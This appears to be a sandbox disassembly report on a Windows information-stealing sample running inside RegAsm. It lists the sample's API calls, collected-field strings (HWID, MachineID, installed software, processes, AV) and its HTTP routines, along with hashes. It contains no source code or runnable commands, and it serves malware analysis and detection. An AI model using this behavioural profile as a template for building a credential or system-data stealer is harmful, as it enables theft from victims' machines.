Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$lstrlen$lstrcpy$CloseHandle$FileHeapHttpOpenReadRequestlstrcatmemcpy$AllocConnectCrackOptionProcessSend
String ID: "$"$"$*$------$------$------$------$build_id$mode
API String ID: 530647464-3630346487
Opcode ID: 2fbd67b6f101177e1ce814d2dec33f040ca1a06e2bbef62635adda29208577d9
Instruction ID: 80b1796918ec1c29b6be473428c1b8ad95fa748133d466919d2d563d3e35a917
Opcode Fuzzy Hash: 2fbd67b6f101177e1ce814d2dec33f040ca1a06e2bbef62635adda29208577d9
Instruction Fuzzy Hash: 1A526271801249EADB15E7E5C952BEEBBB89F19304F2440AEF50173182DE786B4CCB79

Uniqueness

Uniqueness Score: -1.00%

Function 004158F0 Relevance: 50.0, APIs: 2, Strings: 26, Instructions: 1038
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01562EF0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

Part of subcall function 00410300: GetProcessHeap.KERNEL32(00000000,00000104,?,004283B0,00000000,?,00000000,00000000), ref: 0041030E
Part of subcall function 00410300: HeapAlloc.KERNEL32(00000000,?,004283B0,00000000,?,00000000,00000000), ref: 00410315
Part of subcall function 00410300: GetLocalTime.KERNEL32(004283B0,?,004283B0,00000000,?,00000000,00000000), ref: 00410321
Part of subcall function 00410300: wsprintfA.USER32 ref: 0041034D

Part of subcall function 00410C90: memset.MSVCRT ref: 00410CB5
Part of subcall function 00410C90: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,00000000), ref: 00410CD2
Part of subcall function 00410C90: RegQueryValueExA.KERNEL32(00000000,MachineGuid,00000000,00000000,00000000,000000FF), ref: 00410CF4
Part of subcall function 00410C90: CharToOemA.USER32(00000000,?), ref: 00410D12

Part of subcall function 00410D30: GetCurrentHwProfileA.ADVAPI32(?), ref: 00410D45

Part of subcall function 00410D90: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00410DC8
Part of subcall function 00410D90: GetVolumeInformationA.KERNEL32(00421EB9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410E01
Part of subcall function 00410D90: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410E4D
Part of subcall function 00410D90: HeapAlloc.KERNEL32(00000000), ref: 00410E54

GetCurrentProcessId.KERNEL32(00000000,?,Path: ,00000000,?,004283E8,00000000,?,00000000,00000000,00000000,00000000), ref: 00415C2B

Part of subcall function 00411A40: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00411A5C
Part of subcall function 00411A40: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411A77
Part of subcall function 00411A40: CloseHandle.KERNEL32(00000000), ref: 00411A7E

Part of subcall function 00410F40: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410F55
Part of subcall function 00410F40: HeapAlloc.KERNEL32(00000000), ref: 00410F5C

Part of subcall function 004110A0: CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,Windows: ,00000000,?,0042840C,00000000,?,Work Dir: In memory,00000000,?,004283F4,00000000), ref: 004110C3
Part of subcall function 004110A0: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,Windows: ,00000000,?,0042840C), ref: 004110D4
Part of subcall function 004110A0: CoCreateInstance.OLE32(00428D34,00000000,00000001,00428C64,?,?,00000000,?,Windows: ,00000000,?,0042840C,00000000,?,Work Dir: In memory,00000000), ref: 004110EE
Part of subcall function 004110A0: CoSetProxyBlanket.OLE32(004283F4,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,Windows: ,00000000,?,0042840C,00000000), ref: 00411127
Part of subcall function 004110A0: VariantInit.OLEAUT32(?), ref: 00411186

Part of subcall function 00411260: CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,AV: ,00000000,?,00428430,00000000,?,00000000,00000000), ref: 00411283
Part of subcall function 00411260: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,AV: ,00000000,?,00428430), ref: 00411294
Part of subcall function 00411260: CoCreateInstance.OLE32(00428D34,00000000,00000001,00428C64,?,?,00000000,?,AV: ,00000000,?,00428430,00000000,?,00000000,00000000), ref: 004112AE
Part of subcall function 00411260: CoSetProxyBlanket.OLE32(00428430,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,AV: ,00000000,?,00428430,00000000), ref: 004112E7
Part of subcall function 00411260: VariantInit.OLEAUT32(?), ref: 00411342

Part of subcall function 004102C0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0040105B,01562EE0,0041887F), ref: 004102CC
Part of subcall function 004102C0: HeapAlloc.KERNEL32(00000000,?,?,?,0040105B,01562EE0,0041887F), ref: 004102D3
Part of subcall function 004102C0: GetComputerNameA.KERNEL32(00000000,0041887F), ref: 004102E7

Part of subcall function 00410280: GetProcessHeap.KERNEL32(00000000,00000104,?,01562EF0,?,00401074,01562EF0,?,0041887F), ref: 0041028C
Part of subcall function 00410280: HeapAlloc.KERNEL32(00000000,?,01562EF0,?,00401074,01562EF0,?,0041887F), ref: 00410293
Part of subcall function 00410280: GetUserNameA.ADVAPI32(00000000,01562EF0), ref: 004102A7

Part of subcall function 00410C10: CreateDCA.GDI32(01562F10,00000000,00000000,00000000), ref: 00410C2A
Part of subcall function 00410C10: GetDeviceCaps.GDI32(00000000,00000008), ref: 00410C35
Part of subcall function 00410C10: GetDeviceCaps.GDI32(00000000,0000000A), ref: 00410C40
Part of subcall function 00410C10: ReleaseDC.USER32(00000000,00000000), ref: 00410C4B
Part of subcall function 00410C10: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000001,?,?,00415FBA,?,00000000,?,Display Resolution: ,00000000,?,00428460,00000000), ref: 00410C58
Part of subcall function 00410C10: HeapAlloc.KERNEL32(00000000,?,?,00000001,?,?,00415FBA,?,00000000,?,Display Resolution: ,00000000,?,00428460,00000000,?), ref: 00410C5F
Part of subcall function 00410C10: wsprintfA.USER32 ref: 00410C6F

Part of subcall function 004103D0: GetKeyboardLayoutList.USER32(00000000,00000000,004280A7,?,?,00000001), ref: 00410417
Part of subcall function 004103D0: LocalAlloc.KERNEL32(00000040,00000000,?,?,00000001), ref: 00410429
Part of subcall function 004103D0: GetKeyboardLayoutList.USER32(00000000,00000000,?,?,00000001), ref: 00410434
Part of subcall function 004103D0: GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200,?,?,00000001), ref: 00410466
Part of subcall function 004103D0: LocalFree.KERNEL32(?,?,?,00000001), ref: 0041050A

Part of subcall function 00410360: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410371
Part of subcall function 00410360: HeapAlloc.KERNEL32(00000000), ref: 00410378
Part of subcall function 00410360: GetTimeZoneInformation.KERNEL32(?), ref: 00410387
Part of subcall function 00410360: wsprintfA.USER32 ref: 004103B2

Part of subcall function 00410530: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410545
Part of subcall function 00410530: HeapAlloc.KERNEL32(00000000), ref: 0041054C
Part of subcall function 00410530: RegOpenKeyExA.KERNEL32(80000002,0156B940,00000000,00020119,00000000), ref: 0041056B
Part of subcall function 00410530: RegQueryValueExA.KERNEL32(00000000,015719B8,00000000,00000000,00000000,000000FF), ref: 00410586

Part of subcall function 004105E0: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00410602
Part of subcall function 004105E0: GetLastError.KERNEL32(?,?,00000001), ref: 00410610
Part of subcall function 004105E0: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00410648
Part of subcall function 004105E0: wsprintfA.USER32 ref: 00410692

Part of subcall function 004105A0: GetSystemInfo.KERNEL32(00000000), ref: 004105AD
Part of subcall function 004105A0: wsprintfA.USER32 ref: 004105C3

Part of subcall function 004106E0: GetProcessHeap.KERNEL32(00000000,00000104,?,TimeZone: ,00000000,?,004284AC,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00428498), ref: 004106EE
Part of subcall function 004106E0: HeapAlloc.KERNEL32(00000000,?,TimeZone: ,00000000,?,004284AC,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00428498,00000000), ref: 004106F5
Part of subcall function 004106E0: GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040), ref: 00410715
Part of subcall function 004106E0: wsprintfA.USER32 ref: 0041073B

Part of subcall function 00410750: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 004107A7
Part of subcall function 00410750: EnumDisplayDevicesA.USER32(00000000,00000000,000001A8,00000001), ref: 00410834

Part of subcall function 00410B00: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410B4F
Part of subcall function 00410B00: Process32First.KERNEL32(00000000,00000128), ref: 00410B5F
Part of subcall function 00410B00: Process32Next.KERNEL32(00000000,00000128), ref: 00410B71
Part of subcall function 00410B00: Process32Next.KERNEL32(00000000,00000128), ref: 00410BDE
Part of subcall function 00410B00: CloseHandle.KERNEL32(00000000), ref: 00410BE9

Part of subcall function 00410860: RegOpenKeyExA.KERNEL32(00000000,01566258,00000000,00020019,00000000,004280BF,?,00000001), ref: 004108BF

Part of subcall function 00410860: RegEnumKeyExA.KERNEL32(00000000,?,?,00428524,00000000,00000000,00000000,00000000,?,?,00000001), ref: 0041091E
Part of subcall function 00410860: wsprintfA.USER32 ref: 00410947
Part of subcall function 00410860: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,?), ref: 00410965
Part of subcall function 00410860: RegQueryValueExA.KERNEL32(?,01572018,00000000,000F003F,?,00000400), ref: 00410995
Part of subcall function 00410860: lstrlen.KERNEL32(?), ref: 004109AA
Part of subcall function 00410860: RegQueryValueExA.KERNEL32(?,01572108,00000000,000F003F,?,00000400,00000000,00421E41,?,00000000,?,004280F0), ref: 00410A2E

lstrlen.KERNEL32(00000000,00000000,?,00428534,00000000,?,00000000,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00416697

Part of subcall function 00415650: Sleep.KERNEL32(000003E8,00422AB9,fA,?,?,?,00000001), ref: 00415716
Part of subcall function 00415650: CreateThread.KERNEL32(00000000,00000000,004140D0,?,00000000,00000000), ref: 00415737
Part of subcall function 00415650: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00415743

Strings

HWID: , xrefs: 00415B6F
Threads: , xrefs: 00416309
Path: , xrefs: 00415C02
Install Date: , xrefs: 00415D6A
Cores: , xrefs: 00416287
User Name: , xrefs: 00415F0C
W, xrefs: 00416718
[Software], xrefs: 00416592
TimeZone: , xrefs: 0041613C
[Hardware], xrefs: 004161CA
Version: , xrefs: 00415923
Date: , xrefs: 004159E4
VideoCard: , xrefs: 0041640D
RAM: , xrefs: 0041638B
Keyboard Languages: , xrefs: 0041601B
Windows: , xrefs: 00415CEE
Processor: , xrefs: 004161F9
[Processes], xrefs: 004164E7
information.txt, xrefs: 004166B2
GUID: , xrefs: 00415ADC
Display Resolution: , xrefs: 00415F88
Work Dir: In memory, xrefs: 00415C9C
Local Time: , xrefs: 004160BA
Computer Name: , xrefs: 00415E90
MachineID: , xrefs: 00415A60
AV: , xrefs: 00415DFD

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$Process$Alloc$wsprintf$CreateOpen$InformationInitializeQueryValuelstrcpy$EnumLocalNameProcess32lstrlen$BlanketCapsCloseCurrentDeviceDevicesDisplayHandleInfoInitInstanceKeyboardLayoutListLogicalNextProcessorProxySecurityTimeVariantlstrcat$CharComputerDirectoryErrorFileFirstFreeGlobalLastLocaleMemoryModuleObjectProfileReleaseSingleSleepSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZonememset
String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $W$Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
API String ID: 1864629043-4117839003
Opcode ID: e8240602e7ad9623efc1e5c09f4a11ac2f66258fc61510e5e7399bf9964c59ea
Instruction ID: 803c3528c2f6da264819a3d7c940b04ffa2433250a49f127d099ce38e6074702
Opcode Fuzzy Hash: e8240602e7ad9623efc1e5c09f4a11ac2f66258fc61510e5e7399bf9964c59ea
Instruction Fuzzy Hash: A8921E71805249E9CB15E7A1C952BEEBBB85F29304F6440BFB50273182DE7C6B4CCA79

Uniqueness

Uniqueness Score: -1.00%

Function 00414650 Relevance: 39.6, APIs: 11, Strings: 11, Instructions: 1136
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040FF10: lstrlen.KERNEL32(00418949,?,00000000,?,00417FAF,004283A3,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 0040FF1B
Part of subcall function 0040FF10: lstrcpy.KERNEL32(00000000,00418949), ref: 0040FF52

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414861
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004148F6

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 00413D40: StrCmpCA.SHLWAPI(00000000,ERROR,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0042248F), ref: 00413DB5

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414A37
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414ACC
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414C19
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414CBB
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414DFC
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414E91
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414FDE
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415073
Sleep.KERNEL32(0000EA60), ref: 00415082

Part of subcall function 00413EA0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413F37
Part of subcall function 00413EA0: lstrlen.KERNEL32(00000000), ref: 00413F4E
Part of subcall function 00413EA0: StrStrA.SHLWAPI(00000000,00000000), ref: 00413F7A
Part of subcall function 00413EA0: lstrlen.KERNEL32(00000000), ref: 00413F8F
Part of subcall function 00413EA0: lstrlen.KERNEL32(00000000), ref: 00413FAC

Strings

ERROR, xrefs: 00415065
ERROR, xrefs: 00414CAA
ERROR, xrefs: 00414C08
), xrefs: 0041561D
ERROR, xrefs: 00414A29
ERROR, xrefs: 00414853
ERROR, xrefs: 00414FCD
ERROR, xrefs: 00414ABE
ERROR, xrefs: 00414DEE
ERROR, xrefs: 004148E8
ERROR, xrefs: 00414E83

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleep
String ID: )$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 507064821-1563971337
Opcode ID: 19e96281626953c1a908ccdd9ae1c3c26a2b4c0d6237b4cad89262f2261f7a75
Instruction ID: 16c706f6c4dd8a9781f8db293bfe0d0ce14ffdf2baf3511eb8db9a0682d00a07
Opcode Fuzzy Hash: 19e96281626953c1a908ccdd9ae1c3c26a2b4c0d6237b4cad89262f2261f7a75
Instruction Fuzzy Hash: DFA26F70C01248EACB15EBB5C9567DDBBB85F19308F5440BEE90573282EF78574CCAAA

Uniqueness

Uniqueness Score: -1.00%

Function 004074E0 Relevance: 32.1, APIs: 21, Instructions: 578
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004100F0: StrCmpCA.SHLWAPI(?,00000000,?,00407516,0156F720,?,00000000,?), ref: 004100FA

Part of subcall function 0040FF10: lstrlen.KERNEL32(00418949,?,00000000,?,00417FAF,004283A3,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 0040FF1B
Part of subcall function 0040FF10: lstrcpy.KERNEL32(00000000,00418949), ref: 0040FF52

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01562EF0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

Part of subcall function 004114D0: GetSystemTime.KERNEL32(?,0156F1F0,00428288,?,00000000,00000000,004283A2,00000000,?,00000000,00423261,000000FF,?,00418949), ref: 00411525

Part of subcall function 0040FFB0: lstrcpy.KERNEL32(00000000), ref: 00410013
Part of subcall function 0040FFB0: lstrcat.KERNEL32(?,00000000), ref: 0041001F

CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,00000000,?), ref: 004075BF
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040787E
lstrcat.KERNEL32(000000FF,00000000), ref: 004079D1
lstrcat.KERNEL32(000000FF,00427AAC), ref: 004079E0
lstrcat.KERNEL32(000000FF,00000000), ref: 004079F3
lstrcat.KERNEL32(000000FF,00427AB0), ref: 00407A02
lstrcat.KERNEL32(000000FF,00000000), ref: 00407A15
lstrcat.KERNEL32(000000FF,00427AB4), ref: 00407A24
lstrcat.KERNEL32(000000FF,00000000), ref: 00407A37
lstrcat.KERNEL32(000000FF,00427AB8), ref: 00407A46
lstrcat.KERNEL32(000000FF,00000000), ref: 00407A59
lstrcat.KERNEL32(000000FF,00427ABC), ref: 00407A68
lstrcat.KERNEL32(000000FF,00000000), ref: 00407A7B
lstrcat.KERNEL32(000000FF,00427AC0), ref: 00407A8A
lstrcat.KERNEL32(000000FF,00000000), ref: 00407AD1
lstrcat.KERNEL32(000000FF,00427AC4), ref: 00407AEE
lstrlen.KERNEL32(000000FF), ref: 00407B56
lstrlen.KERNEL32(000000FF), ref: 00407B65
RtlAllocateHeap.NTDLL(00000000), ref: 00407885

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 00411AA0: memset.MSVCRT ref: 00411AD5
Part of subcall function 00411AA0: GetProcessHeap.KERNEL32(00000000,000000FA,?,00000000,?,004075E6,0040DC76), ref: 00411B06
Part of subcall function 00411AA0: HeapAlloc.KERNEL32(00000000,?,004075E6,0040DC76), ref: 00411B0D
Part of subcall function 00411AA0: wsprintfW.USER32 ref: 00411B1C
Part of subcall function 00411AA0: OpenProcess.KERNEL32(00001001,00000000), ref: 00411B7D
Part of subcall function 00411AA0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00411B8C
Part of subcall function 00411AA0: CloseHandle.KERNEL32(00000000), ref: 00411B93

memset.MSVCRT ref: 00407BBF
DeleteFileA.KERNEL32(00000000,?,?,?,00427A73), ref: 00407BE7

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$HeapProcesslstrlen$Filememset$AllocAllocateCloseCopyDeleteHandleOpenSystemTerminateTimewsprintf
String ID:
API String ID: 2944411387-0
Opcode ID: d4dcf801c1ccb8dc7afc10bd14a435ef26f06da443b6dd9848c5a20a7ad679ae
Instruction ID: 3ca0864eb58e8f8aa976caedcdd73096d5702bd7c96c1b3cb961cac798526b89
Opcode Fuzzy Hash: d4dcf801c1ccb8dc7afc10bd14a435ef26f06da443b6dd9848c5a20a7ad679ae
Instruction Fuzzy Hash: 99327371804149EBCB14EBA5DC55BEEBB78AF19308F14416EF90273282DF786A48CB75

Uniqueness

Uniqueness Score: -1.00%

Function 00412420 Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 323stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00412466
lstrcpy.KERNEL32(?,00000000), ref: 004124F3
lstrcpy.KERNEL32(?,00000000), ref: 00412530
lstrcpy.KERNEL32(?,00000000), ref: 00412579
lstrcpy.KERNEL32(?,00000000), ref: 004125C2
lstrcpy.KERNEL32(?,00000000), ref: 0041260A
StrCmpCA.SHLWAPI(00000000,true,?), ref: 00412795
strtok_s.MSVCRT ref: 00412822

Strings

true, xrefs: 0041278F
false, xrefs: 004127AF

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$strtok_s
String ID: false$true
API String ID: 2610293679-2658103896
Opcode ID: f6ac08726d2066c4f41ab0cdafdfe6cf974318efcda379675c1cab0782c83bd4
Instruction ID: 9550d4ec349f4b6986a081b59543f2dd3f4438588e0d90f2a146262d3da5c6a3
Opcode Fuzzy Hash: f6ac08726d2066c4f41ab0cdafdfe6cf974318efcda379675c1cab0782c83bd4
Instruction Fuzzy Hash: 42C1F97590010ABFCF14EBA4DC91EDEB779AF04308F10815EF606A7282DE785788CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00405A30 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 200networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FEC0: lstrcpy.KERNEL32(00000000), ref: 0040FEE8

Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 00404412
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040441F
Part of subcall function 004043C0: ??_U@YAPAXI@Z.MSVCRT ref: 0040442C
Part of subcall function 004043C0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00404446
Part of subcall function 004043C0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404456

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405AA8
StrCmpCA.SHLWAPI(?,0156F910,?,?,?,?,?,?,00000004), ref: 00405AC0
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405AE4
HttpOpenRequestA.WININET(00000000,GET,?,01572300,00000000,00000000,-00400100,00000000), ref: 00405B1B
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405B3F
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00405B4A
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00405B68
InternetReadFile.WININET(00000000,?,000007CF,00420429), ref: 00405BB5

Part of subcall function 00410040: lstrlen.KERNEL32(?,?,?,?,?,?,00421D69,000000FF,?,004188B7,?,01562EF0,?), ref: 0041007C
Part of subcall function 00410040: lstrcpy.KERNEL32(00000000), ref: 004100A7
Part of subcall function 00410040: lstrcat.KERNEL32(?,?), ref: 004100B1

Part of subcall function 0040FF60: lstrcpy.KERNEL32(00000000), ref: 0040FFA0

InternetReadFile.WININET(00000000,?,000007CF,00420429), ref: 00405C0B
InternetCloseHandle.WININET(00000000), ref: 00405C16
InternetCloseHandle.WININET(?), ref: 00405C20
InternetCloseHandle.WININET(00000000), ref: 00405C2A

Strings

ERROR, xrefs: 00405C7E
GET, xrefs: 00405B15
ERROR, xrefs: 00405B75

Memory Dump Source

Source File: 00000001.00000002.2794222735.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2794222735.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000043A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2794222735.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequestlstrlen$ConnectCrackInfoOptionQuerySendlstrcat
String ID: ERROR$ERROR$GET
API String ID: 1851261701-2509457195
Opcode ID: 7cda63c94a758bafb6697a22e12d7bccad653b8ed9f67adf24258897b214a233
